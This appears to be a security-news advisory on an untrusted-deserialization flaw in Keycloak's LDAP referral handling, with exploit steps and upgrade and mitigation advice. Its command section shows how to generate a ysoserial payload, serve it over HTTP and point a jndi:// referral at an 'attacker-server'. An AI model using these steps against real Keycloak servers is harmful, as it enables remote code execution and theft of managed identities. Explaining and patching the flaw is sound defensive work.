Listen to this Post
An authenticated Keycloak realm administrator can configure an LDAP User Federation provider with a malicious LDAP server URL. The vulnerability is triggered when the administrator sets an LDAP referral that points to an attacker-controlled LDAP service. When Keycloak follows this configured referral during LDAP operations, it deserializes Java objects received from the untrusted server without proper validation. This deserialization of attacker-supplied data can lead to the execution of arbitrary code within the context of the Keycloak server process, ultimately allowing for full system compromise. The issue stems from insecure handling of Java serialized objects in the LDAP referral processing component.
Platform: Keycloak
Version: < 26.4.6
Vulnerability: Untrusted Deserialization
Severity: Moderate
date: 2025-12-19
Prediction: 2025-12-19
What Undercode Say:
`curl -s https://api.github.com/repos/keycloak/keycloak/releases/latest | grep tag_name`
`java -jar ysoserial.jar CommonsCollections5 ‘id’ > payload.ser`
`python3 -m http.server 1389`
`jndi://attacker-server:1389/payload.ser`
How Exploit:
- Attacker gains realm admin credentials (social engineering, compromise).
- Attacker configures a new LDAP provider in the Keycloak admin console.
- The LDAP server URL points to a malicious server controlled by the attacker.
- The malicious LDAP server is configured to return a referral (
ref) pointing to another attacker-controlled service hosting a serialized Java payload (e.g., generated with ysoserial). - When Keycloak interacts with this provider, it follows the referral and deserializes the malicious object, executing arbitrary code.
Protection from this CVE:
Upgrade to Keycloak version 26.4.6 or later. If immediate upgrade is impossible, apply the mitigation by disabling LDAP referrals in all LDAP user federation provider configurations across all realms via the admin console.
Impact:
Remote Code Execution (RCE) leading to full compromise of the Keycloak server and potentially the underlying host. Unauthorized access to all managed identities and authentication data.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

